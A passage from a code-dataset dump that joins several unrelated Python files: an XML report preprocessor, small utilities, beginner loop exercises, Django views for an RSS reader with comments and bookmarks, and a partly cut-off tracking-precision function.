self.root = ElementTree.XML(xml)\n\n def _addRows(self, row, results, reportName):\n results[reportName].append(ReportData._flatten([ row.find('Label') , [ cell.find('FormattedData') for cell in row.findall('Cells/Cell')] ]))\n if len(row.findall('Rows/Row')) > 0:\n for r in row.findall('Rows/Row'):\n results = self._addRows(r, results, reportName)\n return results\n\n @staticmethod\n def _flatten(x):\n \"\"\"flatten(sequence) -> list\n\n Returns a single, flat list which contains all elements retrieved\n from the sequence and all recursively contained sub-sequences\n (iterables).\n\n Examples:\n >>> [1, 2, [3,4], (5,6)]\n [1, 2, [3, 4], (5, 6)]\n >>> flatten([[[1,2,3], (42,None)], [4,5], [6], 7, MyVector(8,9,10)])\n [1, 2, 3, 42, None, 4, 5, 6, 7, 8, 9, 10]\"\"\"\n\n result = []\n for el in x:\n # if isinstance(el, (list, tuple)):\n if hasattr(el, \"__iter__\") and not isinstance(el, basestring):\n result.extend(ReportData._flatten(el))\n else:\n result.append(el)\n return result\n\n def getDataAsArray(self):\n '''\n Returns data including headers and row labels as a 2-dim array\n for e.g. reports[\"PS_Finance_Report-Finance Report\"][3][0] wil get the 3rd row's row label of the 1st report. 
All values stored as Element\n '''\n reports = []\n results = {}\n if self.root.tag == 'PRIMEReport':\n reports.append(self.root)\n else:\n reports = self.root.findall('PRIMEReport')\n\n for report in reports:\n reportName = report.find('Name').text\n results[reportName] = []\n # Set Column headers\n results[reportName].append(ReportData._flatten([ '', [ i.find('Label') for i in report.findall('ReportContents/Table/Columns/Column')] ]))\n node = report.find('ReportContents/Table')\n if len(node.findall('Rows/Row')) > 0:\n for row in node.findall('Rows/Row'):\n results = self._addRows(row, results, reportName)\n return results\n\n def getReportNode(self, reportName):\n reports = []\n if self.root.tag == 'PRIMEReport':\n reports.append(self.root)\n else:\n reports = self.root.findall('PRIMEReport')\n for report in reports:\n if reportName == report.find('Name').text:\n return report\n return None\n\n def getTreeDepth(self, reportName):\n reportNode = self.getReportNode(reportName)\n depth = [0, ]\n if reportNode:\n table = reportNode.find('ReportContents/Table')\n depth = ReportData._checkDepth(table, depth)\n return max(depth)\n\n @staticmethod\n def _checkDepth(row, depthList, d=0):\n if len(row.findall('Rows/Row')) >= 1:\n depth = d + 1\n depthList.append(depth)\n for r in row.findall('Rows/Row'):\n depthList = ReportData._checkDepth(r, depthList, d=depth)\n else:\n depth = -1\n return depthList\n\n def _getNodeDepth(self, node):\n count = 0\n while node:\n node = node.find('../parent')\n count += 1\n return count\n\n def toXML(self):\n return ElementTree.tostring(self.root)\n\ndef _addInvoiceNr(xml):\n '''\n adds invoice nr - The first trade number that appears in report, if empty, dont show invoice nr label.\n '''\n try:\n rd = ReportData(xml)\n reports = rd.getDataAsArray()\n for report in reports:\n if len(reports[report]) > 2:\n invoiceTag = 'Tax Invoice Nr: ' + reports[report][2][0].text\n else:\n invoiceTag = ''\n\n root = ElementTree.XML(xml)\n reports = []\n if root.tag == 'PRIMEReport':\n reports.append(root)\n else:\n reports = root.findall('PRIMEReport')\n for report in reports:\n reportParameters = report.find(\"ReportParameters\")\n if not reportParameters:\n reportParameters = ElementTree.SubElement(report, \"ReportParameters\")\n\n ElementTree.SubElement(reportParameters, 'InvoiceNr').text = invoiceTag\n return ElementTree.tostring(root)\n except:\n return xml\n\ndef _addRunLocation(xml):\n '''\n adds invoice nr - The first trade number that appears in report, if empty, dont show invoice nr label.\n '''\n try:\n root = ElementTree.XML(xml)\n reports = []\n if root.tag == 'PRIMEReport':\n reports.append(root)\n else:\n reports = root.findall('PRIMEReport')\n for report in reports:\n reportParameters = report.find(\"ReportParameters\")\n if not reportParameters:\n reportParameters = ElementTree.SubElement(report, \"ReportParameters\")\n\n ElementTree.SubElement(reportParameters, 'RunLocation').text = \"FrontEnd\" if str(acm.Class()) == \"FTmServer\" else \"BackEnd\"\n\n return ElementTree.tostring(root)\n except:\n return xml\n\ndef _removeSettledInstrumentRows(xml):\n try:\n root = ElementTree.XML(xml)\n parent_map = dict((c, p) for p in root.getiterator() for c in p)\n for node in root.findall('.//Label'):\n if node.text == 'Expired or Closed Out':\n parent = parent_map[node]\n rows = parent_map[parent]\n parent.remove(parent.find('Rows'))\n rows.remove(parent)\n rows.append(parent)\n return ElementTree.tostring(root)\n except:\n return xml\n\ndef 
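# ReportData._flatten above keeps strings intact while expanding every other
# nested iterable. It relies on Python 2's basestring; this is a hedged sketch
# of the same check spelled for Python 3 (standalone, not part of the source):
def flatten(x):
    result = []
    for el in x:
        # strings are iterable too, so they must be treated as atoms
        if hasattr(el, "__iter__") and not isinstance(el, str):
            result.extend(flatten(el))
        else:
            result.append(el)
    return result

assert flatten([[1, 2], ("a", [3])]) == [1, 2, "a", 3]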
_moveLiveInstrumentRows(xml):\n try:\n root = ElementTree.XML(xml)\n parent_map = dict((c, p) for p in root.getiterator() for c in p)\n for node in root.findall('.//Label'):\n if node.text == 'Live':\n parent = parent_map[node]\n rows = parent_map[parent]\n for liveInstrumentRow in parent.findall('./Rows/Row'):\n rows.append(liveInstrumentRow)\n rows.remove(parent)\n return ElementTree.tostring(root)\n except:\n return xml\n\ndef PreProcessXML(reportObj, param, xml, keep_settled=False):\n ''' Pre-Process the xml for the Prime Brokerage reports by adding elements for the portfolio start and end date and the party address.\n The party name is entered in the parameter field of the Processing tab.\n param = comma separated values\n param[0] - Party name to extract address details...\n param[1] - Report name\n param[2] - (optional) Account name\n param[3] - (optional) Version of the reporting framework that generated the report\n '''\n\n param = param.split(',')\n xml = _addDates(xml)\n xml = _addAddress(xml, param[0])\n xml = _addReportParameter(xml, 'ReportName', param[1])\n xml = _addRunLocation(xml)\n if len(param) > 2 and param[2]:\n xml = _addAccountName(xml, param[2])\n if len(param) > 3 and param[3]:\n xml = _addReportParameter(xml, 'FrameworkVersion', param[3])\n xml = _addInvoiceNr(xml)\n xml = _filterOutErrors(xml)\n xml = _fixFormattingErrors(xml)\n if not keep_settled:\n xml = _moveLiveInstrumentRows(xml)\n xml = _removeSettledInstrumentRows(xml)\n xml = _addGroupLevelColours(xml)\n\n return xml\n\n\ndef PreProcessXMLSortBySettled(reportObj, param, xml):\n \"\"\"Show the \"Live\" records before the \"Expired\" ones.\"\"\"\n xml = PreProcessXML(reportObj, param, xml, keep_settled=True)\n root = ElementTree.XML(xml)\n rows_elements = root.findall('.//Rows')\n for rows_element in rows_elements:\n live_rows = []\n expired_rows = []\n rest = []\n for row in rows_element:\n if row.find('Label').text == 'Live':\n live_rows.append(row)\n elif row.find('Label').text == 'Expired or Closed Out':\n expired_rows.append(row)\n else:\n rest.append(row)\n if not live_rows and not expired_rows:\n continue # Nothing to reorder here.\n for row in chain(live_rows, expired_rows, rest):\n # In this way, all rows are gradually moved to the end in the sorted\n # order.\n rows_element.remove(row)\n rows_element.append(row)\n return ElementTree.tostring(root)\n","sub_path":"Extensions/Prime Services/FPythonCode/PS_XMLReportingTools.py","file_name":"PS_XMLReportingTools.py","file_ext":"py","file_size_in_byte":24425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}{"seq_id":"398843292","text":"# Utility functions for python-delphin\n\ndef unique_filename(filename, max_num=999):\n \"\"\"\n Returns a unique filename for the filename given by appending a number.\n By default, an exception is raised if the number exceeds 999.\n\n @param filename: The base filename to be made unique.\n @param max_num: The highest number value to append to the base filename.\n \"\"\"\n import os\n i = 0\n new_filename = filename\n while os.path.exists(new_filename):\n i += 1\n if i > max_num:\n raise ValueError('Filename extension out of range (%d)' % max_num)\n new_filename = '.'.join([filename, str(i)])\n return new_filename\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}{"seq_id":"641385266","text":"\n\n# Until the counter exceeds 30, print consecutive 
numbers\n# counter = 0\n# while counter <= 30:\n# print(counter)\n# counter += 1\n\n# while True:\n# print(\"I will never finish!!!\")\n\n# expected_potatoes = int(input(\"How many potatoes do you want for dinner? \"))\n# potatoes = []\n# while len(potatoes) < expected_potatoes:\n# print(\"Peeling a potato...\")\n# print(\"And dropping it into the pot :)\")\n# potatoes.append(\"Potato\")\n# print(potatoes)\n\n\n# We want the number entered by the user to be greater than 100\n# number = int(input(\"Enter a number greater than 100: \"))\n# while number <= 100:\n# print(f\"{number} is not greater than 100! Let's try again... \\n\")\n# number = int(input(\"Enter a number greater than 100: \"))\n#\n# print(f\"Well done!\")\n\n# We can make sure the user entered a sensible value\n# age = int(input(\"How old are you? \"))\n# while age < 1:\n# print(\"I don't think so...\\n\")\n# age = int(input(\"How old are you? \"))\n#\n# if age < 18:\n# print(\"You cannot vote yet\")\n# else:\n# print(\"You can vote now!\")\n\n# We let the user run the program multiple times\noption = \"T\"\nwhile option == \"T\":\n income = int(input(\"Enter the revenue: \"))\n employees_number = int(input(\"Enter the number of employees: \"))\n years_on_the_market = int(input(\"How many years have you been on the market: \"))\n if income < 2000:\n print(\"Main support granted\")\n elif 5 <= employees_number <= 10:\n print(\"Support from the employee fund granted\")\n elif years_on_the_market < 3:\n print(\"Support for new companies granted\")\n else:\n print(\"Consolation support granted ;)\")\n\n option = input(\"If you want to check other data, type 'T': \")\n","sub_path":"week_5/while_loop/while_examples.py","file_name":"while_examples.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}{"seq_id":"27587964","text":"# Python built-in packages\nimport ConfigParser\nimport logging\nimport os\n\n\nclass Configuration(object):\n \"\"\"\n Constructor method for initializing the Configuration class\n \"\"\"\n def __init__(self, *args, **kwargs):\n if not hasattr(self, \"logger\"):\n self.logger = logging.getLogger(__name__)\n self.logger.debug(\"Instance <%s>: function call to \\\"%s\\\"\", id(self), self.__init__.__name__)\n\n self.config = ConfigParser.RawConfigParser()\n self.config.readfp(open(\"config/image-organizer.properties\"))\n self.config.set(\"ImageOrganizer\", \"sys.path.root\", os.getcwd())\n\n def get_config(self):\n self.logger.debug(\"Instance <%s>: function call to \\\"%s\\\"\", id(self), self.get_config.__name__)\n return self.config\n","sub_path":"core/Configuration.py","file_name":"Configuration.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}{"seq_id":"41452069","text":"import json\nimport logging\n\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\nfrom django.conf import settings\nfrom django.http import Http404, HttpResponseForbidden\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic import View\n\nfrom feeds import api_responses\nfrom feeds.forms import FeedCreateFromURLForm, FeedChangeScheduledUpdatePeriodForm, 
FeedChangeFeedURLForm, \\\n CommentAddForm\nfrom feeds.models import Feed, Entry, FeedSubscription, Comment\n\nlogger = logging.getLogger(__name__)\n\n\nclass BaseView(View):\n \"\"\"\n This view class (and it's descendants) will run methods listed in self.pre_dispatch_hooks before\n actually calling dispatch(). Those hooks must return a tuple of (WSGIRequest, response (may be None).\n If any of those hooks will return a response instead of None, dispatch() won't be called,\n and this response will be returned instead.\n\n This is done to reduce code duplication and to assure that different views that access same resource\n will behave consistently.\n \"\"\"\n pre_dispatch_hooks = []\n\n def dispatch(self, request, *args, **kwargs):\n request, hooks_response = self.run_hooks(self.pre_dispatch_hooks, request, *args, **kwargs)\n if hooks_response:\n logger.warning(\"Pre-dispatch hooks returned non-empty response, \"\n \"will return it instead of calling dispatch()\")\n return hooks_response\n\n dispatch_response = super().dispatch(request, *args, **kwargs)\n return dispatch_response\n\n def run_hooks(self, hook_list, request, *args, **kwargs):\n # I am sure there are better ways to do this :)\n logger.debug(\"Configured hooks for {}: {}\".format(self.__class__.__name__, hook_list))\n for hook_name in hook_list:\n hook = getattr(self, hook_name)\n if not hook:\n raise ImproperlyConfigured(\"View {} defined {} as one of it's hooks, \"\n \"but it does not have this attribute\".format(self.__class__.__name__,\n hook_name))\n\n logger.debug(\"Running hook {} of {}\".format(hook_name, self.__class__.__name__))\n request, response = hook(request, *args, **kwargs)\n logger.debug(\"Hook {} of {} return values: {}\".format(hook_name,\n self.__class__.__name__,\n (request, response)))\n # Bail out if hook produced a response\n if response:\n logger.debug(\"Hook {} produced a response, aborting hooks iteration and returning\".format(hook_name))\n return request, response\n\n return request, None\n\n\nclass FeedScopedBaseView(BaseView):\n \"\"\"\n This View class will extract a feed id from kwargs, fetch the corresponding Feed model and add it\n to the request object, producing 404 on fetch failures.\n This View will also redirect users that tried to access private feed or it's entries to the login page\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.pre_dispatch_hooks = [\n \"get_feed_from_kwargs\",\n \"redirect_to_login_for_private_feeds\"\n ]\n\n def get_feed_from_kwargs(self, request, *args, **kwargs):\n try:\n request.feed = Feed.objects.get(pk=kwargs[\"feed_id\"])\n except Feed.DoesNotExist:\n raise Http404\n else:\n return request, None\n\n def redirect_to_login_for_private_feeds(self, request, *args, **kwargs):\n if request.feed.private and request.feed.user != request.user:\n return request, redirect(\"{}?next={}\".format(reverse(\"login\"), request.path))\n else:\n return request, None\n\n\nclass FeedScopedProtectedBaseView(FeedScopedBaseView):\n \"\"\"\n This View will do all of the things that FeedScopedBaseView does, but it will\n also check that request.user is matching the requested Feed owner.\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n self.pre_dispatch_hooks += [\n \"return_403_if_request_user_does_not_match_feed_user\"\n ]\n\n def return_403_if_request_user_does_not_match_feed_user(self, request, *args, **kwargs):\n if request.feed.user != request.user:\n logger.warning(\"User {} tried to access protected FeedView 
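# The BaseView docstring above describes the pre-dispatch hook chain: every
# hook receives the request and may short-circuit dispatch by returning a
# response. The same control flow without Django, as an illustrative sketch
# (the hook names and the dict standing in for a request are invented):
def run_hooks(hooks, request):
    for hook in hooks:
        request, response = hook(request)
        if response is not None:
            return request, response  # short-circuit: dispatch is skipped
    return request, None

tag = lambda request: (dict(request, tagged=True), None)
deny = lambda request: (request, "403 Forbidden")

assert run_hooks([tag], {})[1] is None
assert run_hooks([tag, deny], {})[1] == "403 Forbidden"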
{}\".format(request.user,\n self.__class__.__name__))\n return request, HttpResponseForbidden()\n else:\n return request, None\n\n\nclass EntryFeedScopedBaseView(FeedScopedBaseView):\n \"\"\"\n This View will do all of the things that FeedScopedBaseView does, but it will\n also extract `entry_id` from kwargs, fetch the corresponding Entry model and add it\n to the request object, producing 404 on fetch failures\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n self.pre_dispatch_hooks += [\n \"get_entry_from_kwargs\"\n ]\n\n def get_entry_from_kwargs(self, request, *args, **kwargs):\n try:\n request.entry = Entry.objects.get(pk=kwargs[\"entry_id\"])\n except Entry.DoesNotExist:\n raise Http404\n else:\n return request, None\n\n\nclass FeedReadView(LoginRequiredMixin, FeedScopedBaseView):\n template_name = \"feed.html\"\n\n def get(self, request, *args, **kwargs):\n context = {}\n\n logger.debug(\"Displaying {}\".format(request.feed))\n # Sort by updated_at if available, then by fetched_at\n sorted_entries = request.feed.get_all_entries_sorted_by_date()\n annotated_entries = Entry.annotate_entries_with_bookmarks(\n Entry.annotate_entries_with_entryviews(sorted_entries, request.user), request.user)\n\n unseen_entries_count = annotated_entries.filter(seen_by_user=False).count()\n is_user_subscribed_to_this_feed = request.feed.is_user_subscribed_to_feed(request.user)\n\n paginator = Paginator(annotated_entries, settings.ITEMS_PER_PAGE) # Show ITEMS_PER_PAGE feed items per page\n\n page = request.GET.get('page')\n logger.debug(\"Requested page: {}\".format(page))\n try:\n feed_entries_page = paginator.page(page)\n except PageNotAnInteger:\n feed_entries_page = paginator.page(1)\n except EmptyPage:\n feed_entries_page = paginator.page(paginator.num_pages)\n\n context.update({\"feed\": request.feed,\n \"feed_entries_page\": feed_entries_page,\n \"unseen_entries_count\": unseen_entries_count,\n \"total_entries_count\": annotated_entries.count(),\n \"is_user_subscribed_to_this_feed\": is_user_subscribed_to_this_feed})\n\n return render(request, self.template_name, context)\n\n\nclass FeedCreateFromURLView(LoginRequiredMixin, BaseView):\n template_name = \"feed_create_from_url.html\"\n\n def get(self, request, *args, **kwargs):\n return render(request, self.template_name, {\"feed_creation_form\": FeedCreateFromURLForm()})\n\n def post(self, request, *args, **kwargs):\n feed_creation_form = FeedCreateFromURLForm(request.POST)\n\n if feed_creation_form.is_valid():\n feed_url = feed_creation_form.cleaned_data.get(\"feed_url\")\n private = feed_creation_form.cleaned_data.get(\"private\", False)\n scheduled_update_period = feed_creation_form.cleaned_data.get(\"scheduled_update_period\")\n\n logger.info(\"Will now try to create a Feed (feed url {}, private {})\".format(feed_url, private))\n try:\n created_feed = Feed.create_from_feed_url(request.user, feed_url, private, scheduled_update_period,\n create_periodic_task=True)\n except Feed.CreationFromFeedUrlFailed as e:\n logger.exception(\"Failed to create feed from {} due to: {}: {}\".format(feed_url,\n e.__class__.__name__,\n e))\n feed_creation_form.add_error(None, \"Failed to create a feed from provided URL. 
Please make sure that \"\n \"you have entered the correct URL for a feed.\")\n return render(request, self.template_name, {\"feed_creation_form\": feed_creation_form})\n else:\n logger.info(\"{} created, redirecting\".format(created_feed))\n return redirect(reverse(\"feeds:feed\", kwargs={\"feed_id\": created_feed.pk}))\n else:\n return render(request, self.template_name, {\"feed_creation_form\": feed_creation_form})\n\n\nclass FeedDeleteView(LoginRequiredMixin, FeedScopedProtectedBaseView):\n template_name = \"feed_delete.html\"\n\n def get(self, request, *args, **kwargs):\n return render(request, self.template_name, {\"feed\": request.feed})\n\n def post(self, request, *args, **kwargs):\n logger.debug(\"Deleting {}\".format(request.feed))\n request.feed.delete()\n return redirect(reverse(\"feeds:browse\"))\n\n\nclass FeedUpdateView(LoginRequiredMixin, FeedScopedBaseView):\n template_name = \"feed.html\"\n\n def post(self, request, *args, **kwargs):\n logger.debug(\"Updating {}\".format(request.feed))\n # Sort by updated_at if available, then by fetched_at\n\n try:\n request.feed.update()\n except request.feed.FeedUpdateFailed as e:\n logger.warning(\"Feed update failed due to: {}: {}\".format(e.__class__.__name__, e))\n finally:\n return redirect(reverse(\"feeds:feed\", kwargs={\"feed_id\": request.feed.pk}))\n\n\nclass FeedChangeScheduledUpdatePeriodView(LoginRequiredMixin, FeedScopedProtectedBaseView):\n template_name = \"feed_change_scheduled_update_period.html\"\n\n def get(self, request, *args, **kwargs):\n return render(request, self.template_name, {\"feed\": request.feed,\n \"feed_change_period_form\": FeedChangeScheduledUpdatePeriodForm()})\n\n def post(self, request, *args, **kwargs):\n feed_change_period_form = FeedChangeScheduledUpdatePeriodForm(request.POST)\n\n if feed_change_period_form.is_valid():\n scheduled_update_period = feed_change_period_form.cleaned_data.get(\"scheduled_update_period\")\n request.feed.scheduled_update_period = scheduled_update_period\n request.feed.save()\n request.feed.update_periodic_task_period()\n\n return redirect(reverse(\"feeds:feed\", kwargs={\"feed_id\": request.feed.pk}))\n else:\n return render(request, self.template_name, {\"feed\": request.feed,\n \"feed_change_period_form\": feed_change_period_form})\n\n\nclass FeedChangeFeedURLView(LoginRequiredMixin, FeedScopedProtectedBaseView):\n template_name = \"feed_change_feed_url.html\"\n\n def get(self, request, *args, **kwargs):\n return render(request, self.template_name, {\"feed\": request.feed,\n \"feed_change_url_form\": FeedChangeFeedURLForm()})\n\n def post(self, request, *args, **kwargs):\n feed_change_url_form = FeedChangeFeedURLForm(request.POST)\n\n if feed_change_url_form.is_valid():\n feed_url = feed_change_url_form.cleaned_data.get(\"feed_url\")\n delete_entries = feed_change_url_form.cleaned_data.get(\"delete_entries\")\n\n request.feed.feed_url = feed_url\n request.feed.save()\n\n try:\n request.feed.update(delete_entries=delete_entries)\n except Feed.FeedUpdateFailed as e:\n logger.debug(\"{} update after URL change failed due to: {}: {}\".format(request.feed,\n e.__class__.__name__,\n e))\n\n return redirect(reverse(\"feeds:feed\", kwargs={\"feed_id\": request.feed.pk}))\n else:\n render(request, self.template_name, {\"feed\": request.feed,\n \"feed_change_url_form\": feed_change_url_form})\n\n\nclass FeedMakePrivateView(LoginRequiredMixin, FeedScopedProtectedBaseView):\n def post(self, request, *args, **kwargs):\n\n if request.feed.private:\n logger.info(\"{} is already 
private\".format(request.feed))\n\n else:\n logger.info(\"Making {} private\".format(request.feed))\n request.feed.private = True\n request.feed.save()\n\n return redirect(reverse(\"feeds:feed\", kwargs={\"feed_id\": request.feed.pk}))\n\n\nclass FeedMakePublicView(LoginRequiredMixin, FeedScopedProtectedBaseView):\n def post(self, request, *args, **kwargs):\n if request.feed.private:\n logger.info(\"Making {} public\".format(request.feed))\n request.feed.private = False\n request.feed.save()\n else:\n logger.info(\"{} is already public\".format(request.feed))\n\n return redirect(reverse(\"feeds:feed\", kwargs={\"feed_id\": request.feed.pk}))\n\n\nclass FeedSubscribeView(LoginRequiredMixin, FeedScopedBaseView):\n def post(self, request, *args, **kwargs):\n if request.feed.is_user_subscribed_to_feed(request.user):\n logger.info(\"{} is not subscribed to {}, nothing to do\".format(request.user, request.feed))\n else:\n logger.debug(\"Subscribing {} to {}\".format(request.user, request.feed))\n request.feed.subscribe_user_to_feed(request.user)\n\n return redirect(reverse(\"feeds:feed\", kwargs={\"feed_id\": request.feed.pk}))\n\n\nclass FeedUnsubscribeView(LoginRequiredMixin, FeedScopedBaseView):\n def post(self, request, *args, **kwargs):\n logger.debug(\"Toggling {} subscription\".format(request.feed))\n\n if request.feed.is_user_subscribed_to_feed(request.user):\n logger.debug(\"Unubscribing {} from {}\".format(request.user, request.feed))\n request.feed.unsubscribe_user_from_feed(request.user)\n else:\n logger.info(\"{} is not subscribed to {}, nothing to do\".format(request.user, request.feed))\n\n return redirect(reverse(\"feeds:feed\", kwargs={\"feed_id\": request.feed.pk}))\n\n\nclass FeedsBrowseView(LoginRequiredMixin, BaseView):\n template_name = \"browse_feeds.html\"\n\n def get(self, request, *args, **kwargs):\n all_public_feeds = list(Feed.objects.filter(private=False))\n user_private_feeds = list(Feed.objects.filter(private=True, user=request.user))\n\n # sort by_date\n feeds = all_public_feeds + user_private_feeds\n logger.debug(\"Getting all feeds\")\n logger.debug(\"All feeds: {} \".format(feeds))\n if feeds:\n sorted_feeds = sorted(feeds, key=lambda x: x.updated_at if x.updated_at else x.fetched_at)\n sorted_feeds.reverse()\n\n sorted_feeds_with_unseen_entries_by_user_count = [\n {\"feed\": feed,\n \"entries_unseen_by_user_count\": feed.get_entries_unseen_by_user(request.user).count(),\n \"date\": feed.updated_at if feed.updated_at else feed.fetched_at,\n \"user_subscribed\": feed.is_user_subscribed_to_feed(request.user)} for feed in sorted_feeds]\n\n paginator = Paginator(sorted_feeds_with_unseen_entries_by_user_count, settings.ITEMS_PER_PAGE)\n\n page = request.GET.get('page')\n logger.debug(\"Requested page: {}\".format(page))\n try:\n feeds_with_counts_page = paginator.page(page)\n except PageNotAnInteger:\n feeds_with_counts_page = paginator.page(1)\n except EmptyPage:\n feeds_with_counts_page = paginator.page(paginator.num_pages)\n\n else:\n logger.debug(\"No feeds!\")\n feeds_with_counts_page = None\n\n return render(request, self.template_name, {\"feeds_with_counts_page\": feeds_with_counts_page})\n\n\nclass FeedsSubscribedBrowseView(LoginRequiredMixin, BaseView):\n template_name = \"browse_subscribed_feeds.html\"\n\n def get(self, request, *args, **kwargs):\n # sort by_date\n\n feed_subscriptions = FeedSubscription.objects.filter(user=request.user)\n\n feeds = [feed_subscription.feed for feed_subscription in feed_subscriptions]\n\n if feeds:\n sorted_feeds = 
sorted(feeds, key=lambda x: x.updated_at if x.updated_at else x.fetched_at)\n sorted_feeds.reverse()\n\n feeds_with_counts = [\n {\"feed\": feed,\n \"entries_unseen_by_user_count\": feed.get_entries_unseen_by_user(request.user).count(),\n \"date\": feed.updated_at if feed.updated_at else feed.fetched_at,\n } for feed in sorted_feeds]\n\n paginator = Paginator(feeds_with_counts, settings.ITEMS_PER_PAGE)\n\n page = request.GET.get('page')\n logger.debug(\"Requested page: {}\".format(page))\n\n try:\n feeds_with_counts_page = paginator.page(page)\n except PageNotAnInteger:\n feeds_with_counts_page = paginator.page(1)\n except EmptyPage:\n feeds_with_counts_page = paginator.page(paginator.num_pages)\n\n else:\n logger.debug(\"No subscribed feeds!\")\n feeds_with_counts_page = None\n\n return render(request, self.template_name, {\"feeds_with_counts_page\": feeds_with_counts_page})\n\n\nclass EntryReadView(LoginRequiredMixin, EntryFeedScopedBaseView):\n template_name = \"entry.html\"\n\n def get(self, request, *args, **kwargs):\n request.entry.mark_as_seen_by_user(request.user)\n\n comments = request.entry.comment_set.order_by(\"-added_at\")\n comment_add_form = CommentAddForm()\n\n ctx = {\"entry\": request.entry,\n \"bookmarked_by_user\": request.entry.is_bookmarked_by_user(request.user),\n \"comments\": comments,\n \"comment_add_form\": comment_add_form}\n\n return render(request, self.template_name, ctx)\n\n\nclass CommentAddView(LoginRequiredMixin, EntryFeedScopedBaseView):\n def post(self, request, *args, **kwargs):\n comment_add_form = CommentAddForm(request.POST)\n if comment_add_form.is_valid():\n request.entry.add_comment(comment_add_form.cleaned_data[\"body\"], request.user)\n\n return redirect(reverse(\"feeds:feed-entry-read\", kwargs={\"feed_id\": request.feed.pk,\n \"entry_id\": request.entry.pk}))\n\n\nclass CommentDeleteView(LoginRequiredMixin, EntryFeedScopedBaseView):\n def post(self, request, *args, **kwargs):\n try:\n comment_id = kwargs[\"comment_id\"]\n comment = Comment.objects.get(pk=comment_id)\n except Comment.DoesNotExist:\n logger.debug(\"Comment with ID {} does not exist\".format(comment_id))\n else:\n if request.user != comment.user:\n logger.debug(\"Can't delete {} because request.user {} differs with comment user {}\"\n \"\".format(comment, request.user, comment.user))\n else:\n logger.debug(\"Deleting {}\".format(comment))\n comment.delete()\n\n return redirect(reverse(\"feeds:feed-entry-read\", kwargs={\"feed_id\": request.feed.pk,\n \"entry_id\": request.entry.pk}))\n\n\nclass JSONAPIView(BaseView):\n \"\"\"\n Parses JSON from incoming request and, if successful, adds JSON to request as an attribute\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.pre_dispatch_hooks = [\"get_json_from_request\"]\n\n def get_json_from_request(self, request, *args, **kwargs):\n if request.method.lower() in [\"post\", \"put\", \"patch\"]:\n try:\n request.json = json.loads(request.body.decode('utf-8'))\n except Exception as e:\n logger.warning(\"Bad JSON passed, HTTP body: {}, JSON parsing exception: {}: {}\"\n \"\".format(request.body, e.__class__.__name__, e))\n return request, api_responses.ApiBadRequestResponse(\n reason=\"JSON data is malformed or not present in the request body\")\n else:\n return request, None\n\n\n@method_decorator(csrf_exempt, \"dispatch\")\nclass APILoginRequiredMixin(LoginRequiredMixin):\n \"\"\"\n Returns a JSON response with 403 rather than redirecting to login\n \"\"\"\n\n def handle_no_permission(self):\n return 
api_responses.ApiUnauthorizedResponse(reason=\"You must be logged in to perform this request\")\n\n\nclass ToggleBookmarkView(APILoginRequiredMixin, JSONAPIView):\n def post(self, request, *args, **kwargs):\n entry_id = request.json.get(\"entry_id\")\n if not entry_id:\n return api_responses.ApiBadRequestResponse(reason=\"entry_id field is missing from the request JSON data\")\n\n try:\n entry = Entry.objects.get(pk=entry_id)\n except Entry.DoesNotExist:\n logger.warning(\"Entry with ID {} does not exist\".format(entry_id))\n return api_responses.ApiNotFoundResponse(reason=\"Entry with ID {} does not exist\".format(entry_id))\n\n bookmarked_by_user = entry.toggle_bookmark(request.user)\n logger.debug(\"{} bookmarked by {}: {}\".format(entry, request.user, bookmarked_by_user))\n\n return api_responses.ApiOkResponse(data={\"bookmarked_by_user\": bookmarked_by_user})\n","sub_path":"sc_rss_reader/feeds/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":22121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}{"seq_id":"445537454","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 17 10:19:38 2016\r\n\r\n@author: Jiangfeng Xiong\r\n\"\"\"\r\nimport matplotlib.pyplot as pl\r\nimport numpy as np\r\n\r\n\r\n#position and ground_truth format:\r\n#top_left_x top_left_y width height\r\ndef calculate_overlap(A,B):\r\n leftA = A[:,0];\r\n bottomA = A[:,1];\r\n rightA = leftA + A[:,2] - 1;\r\n topA = bottomA + A[:,3] - 1;\r\n \r\n leftB = B[:,0];\r\n bottomB = B[:,1];\r\n rightB = leftB + B[:,2] - 1;\r\n topB = bottomB + B[:,3] - 1;\r\n \r\n tmp = (max(0, min(rightA, rightB) - max(leftA, leftB)+1 ))* (max(0, min(topA, topB) - max(bottomA, bottomB)+1 ));\r\n areaA = A[:,2] * A[:,3];\r\n areaB = B[:,2] * B[:,3];\r\n overlap = tmp/(areaA+areaB-tmp)\r\n \r\n return overlap\r\n \r\ndef calculate_precision(positions,ground_truth,title,show=True):\r\n \r\n max_threshold = 50\r\n precision = np.zeros((max_threshold,1))\r\n \r\n # \r\n positions[:,0] = positions[:,0] + positions[:,2]/2\r\n positions[:,1] = positions[:,1] + positions[:,3]/2\r\n \r\n ground_truth[:,0] = ground_truth[:,0] + ground_truth[:,2]/2\r\n ground_truth[:,1] = ground_truth[:,1] + ground_truth[:,3]/2\r\n \r\n \r\n distances = np.sqrt((positions[:,0]-ground_truth[:,0])**2 \\\r\n + (positions[:,1]-ground_truth[:,1])**2)\r\n \r\n for p in xrange(max_threshold):\r\n precision[p] = np.size(np.nonzero(distances<=p))*1.0/np.size(distances)\r\n \r\n if show == True:\r\n t = np.arange(0,max_threshold)\r\n pl.plot(t,precision,'b')\r\n pl.title(title)\r\n pl.xlabel('Threshold')\r\n 